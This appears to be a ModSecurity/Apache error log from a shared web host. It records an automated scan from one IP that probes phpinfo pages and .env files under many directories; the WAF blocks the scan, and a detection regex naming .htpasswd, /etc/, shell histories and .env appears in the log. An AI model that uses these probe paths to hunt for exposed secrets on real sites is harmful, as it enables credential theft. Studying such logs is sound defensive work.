[Tue May 26 14:49:43.340824 2026] [security2:error] [pid 648203:tid 648449] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTsMwAAAPk"]
[Tue May 26 14:49:43.341581 2026] [security2:error] [pid 648203:tid 648367] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTsMgAAAKc"]
[Tue May 26 14:49:43.344149 2026] [security2:error] [pid 648203:tid 648423] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTsLAAAAN8"]
[Tue May 26 14:49:43.344231 2026] [security2:error] [pid 648203:tid 648382] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTsJgAAALY"]
[Tue May 26 14:49:43.344571 2026] [security2:error] [pid 648203:tid 648383] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTsIAAAALc"]
[Tue May 26 14:49:43.345806 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTsJAAAAJ0"]
[Tue May 26 14:49:43.348681 2026] [security2:error] [pid 648203:tid 648348] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsOwAAAJQ"]
[Tue May 26 14:49:43.351854 2026] [security2:error] [pid 648203:tid 648446] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsSQAAAPY"]
[Tue May 26 14:49:43.355338 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsPAAAAKM"]
[Tue May 26 14:49:43.360222 2026] [security2:error] [pid 648203:tid 648443] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsQAAAAPM"]
[Tue May 26 14:49:43.363328 2026] [security2:error] [pid 648203:tid 648361] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsQwAAAKE"]
[Tue May 26 14:49:43.495587 2026] [security2:error] [pid 648203:tid 648253] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/php-info.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsYQAA-DE"]
[Tue May 26 14:49:43.495696 2026] [security2:error] [pid 648203:tid 648209] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/php.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsYgAA-AU"]
[Tue May 26 14:49:43.496795 2026] [security2:error] [pid 648203:tid 648266] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/php_info.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsYwAA-D4"]
[Tue May 26 14:49:43.503391 2026] [security2:error] [pid 648203:tid 648212] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/phpinfo.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsaQAA-Ag"]
[Tue May 26 14:49:43.515168 2026] [security2:error] [pid 648203:tid 648284] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/portal/.env"] [unique_id "ahVlr7EQDDtxJNiDrdTscQAA-FA"]
[Tue May 26 14:49:43.527944 2026] [security2:error] [pid 648203:tid 648373] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsVQAAAK0"]
[Tue May 26 14:49:43.536061 2026] [security2:error] [pid 648203:tid 648390] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsVAAAAL4"]
[Tue May 26 14:49:43.560068 2026] [security2:error] [pid 648203:tid 648448] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsXwAA-HE"]
[Tue May 26 14:49:43.562177 2026] [security2:error] [pid 648203:tid 648380] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsWQAAALQ"]
[Tue May 26 14:49:43.565836 2026] [security2:error] [pid 648203:tid 648404] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsXQAAAMw"]
[Tue May 26 14:49:43.570177 2026] [security2:error] [pid 648203:tid 648347] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsbAAAAJM"]
[Tue May 26 14:49:43.573755 2026] [security2:error] [pid 648203:tid 648442] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsbQAAAPI"]
[Tue May 26 14:49:43.577311 2026] [security2:error] [pid 648203:tid 648418] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTscAAAANo"]
[Tue May 26 14:49:43.578441 2026] [security2:error] [pid 648203:tid 648426] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsbwAAAOI"]
[Tue May 26 14:49:43.583319 2026] [security2:error] [pid 648203:tid 648450] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsawAAAPo"]
[Tue May 26 14:49:43.585163 2026] [security2:error] [pid 648203:tid 648448] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsbgAA-Ak"]
[Tue May 26 14:49:43.645926 2026] [security2:error] [pid 648203:tid 648210] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/prod/.env"] [unique_id "ahVlr7EQDDtxJNiDrdTsdwAAngY"]
[Tue May 26 14:49:43.663165 2026] [security2:error] [pid 648203:tid 648249] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/product/.env"] [unique_id "ahVlr7EQDDtxJNiDrdTsfQAAni0"]
[Tue May 26 14:49:43.677280 2026] [security2:error] [pid 648203:tid 648208] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/production/.env"] [unique_id "ahVlr7EQDDtxJNiDrdTsgQAAngQ"]
[Tue May 26 14:49:43.709752 2026] [security2:error] [pid 648203:tid 648454] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsfAAAAP4"]
[Tue May 26 14:49:43.711115 2026] [security2:error] [pid 648203:tid 648289] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/project/.env"] [unique_id "ahVlr7EQDDtxJNiDrdTsiQAAnlU"]
[Tue May 26 14:49:43.716323 2026] [security2:error] [pid 648203:tid 648368] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsewAAAKg"]
[Tue May 26 14:49:43.718733 2026] [security2:error] [pid 648203:tid 648215] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/public-api/.env"] [unique_id "ahVlr7EQDDtxJNiDrdTsjQAAngs"]
[Tue May 26 14:49:43.719339 2026] [security2:error] [pid 648203:tid 648358] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsegAAnnc"]
[Tue May 26 14:49:43.722293 2026] [security2:error] [pid 648203:tid 648305] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/public/.env"] [unique_id "ahVlr7EQDDtxJNiDrdTsjwAAnmU"]
[Tue May 26 14:49:43.725019 2026] [security2:error] [pid 648203:tid 648319] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/public/phpinfo.php"] [unique_id "ahVlr7EQDDtxJNiDrdTskQAAnnM"]
[Tue May 26 14:49:43.750642 2026] [security2:error] [pid 648203:tid 648382] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTshgAAALY"]
[Tue May 26 14:49:44.138979 2026] [security2:error] [pid 648203:tid 648383] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTshwAAALc"]
[Tue May 26 14:49:44.174672 2026] [security2:error] [pid 648203:tid 648370] [client 65.111.9.50:28067] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsPQAAAKo"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:44.292789 2026] [security2:error] [pid 648203:tid 648336] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsjgAAAIg"]
[Tue May 26 14:49:44.293325 2026] [security2:error] [pid 648203:tid 648358] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTskgAAnn4"]
[Tue May 26 14:49:44.295902 2026] [security2:error] [pid 648203:tid 648350] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTskAAAAJY"]
[Tue May 26 14:49:44.314721 2026] [security2:error] [pid 648203:tid 648315] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/qa/.env"] [unique_id "ahVlsLEQDDtxJNiDrdTsoAAAnm8"]
[Tue May 26 14:49:44.314845 2026] [security2:error] [pid 648203:tid 648312] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/public_html/.env"] [unique_id "ahVlsLEQDDtxJNiDrdTsnwAAnmw"]
[Tue May 26 14:49:44.391153 2026] [security2:error] [pid 648203:tid 648364] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTstwAAAKQ"]
[Tue May 26 14:49:44.392971 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTsuAAAALI"]
[Tue May 26 14:49:44.395231 2026] [security2:error] [pid 648203:tid 648405] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTsugAAAM0"]
[Tue May 26 14:49:44.395610 2026] [security2:error] [pid 648203:tid 648396] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTsuQAAAMQ"]
[Tue May 26 14:49:44.397056 2026] [security2:error] [pid 648203:tid 648395] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTsvQAAAMM"]
[Tue May 26 14:49:44.397552 2026] [security2:error] [pid 648203:tid 648439] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTsvgAAAO8"]
[Tue May 26 14:49:44.398760 2026] [security2:error] [pid 648203:tid 648376] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTstgAAALA"]
[Tue May 26 14:49:44.398940 2026] [security2:error] [pid 648203:tid 648390] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTsuwAAAL4"]
[Tue May 26 14:49:44.402683 2026] [security2:error] [pid 648203:tid 648373] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTstQAAAK0"]
[Tue May 26 14:49:44.408938 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTsvAAAAKk"]
[Tue May 26 14:49:44.439691 2026] [security2:error] [pid 648203:tid 648255] [remote 69.63.184.15:47330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.184.63.69.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVlsLEQDDtxJNiDrdTswQAA8zM"]
[Tue May 26 14:49:44.520927 2026] [security2:error] [pid 648203:tid 648460] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTsxgAAAQQ"]
[Tue May 26 14:49:44.524181 2026] [security2:error] [pid 648203:tid 648448] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTsyAAAAPg"]
[Tue May 26 14:49:44.531514 2026] [security2:error] [pid 648203:tid 648420] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTszgAAANw"]
[Tue May 26 14:49:44.532694 2026] [security2:error] [pid 648203:tid 648354] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTszQAAAJo"]
[Tue May 26 14:49:44.549299 2026] [security2:error] [pid 648203:tid 648381] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs1AAAALU"]
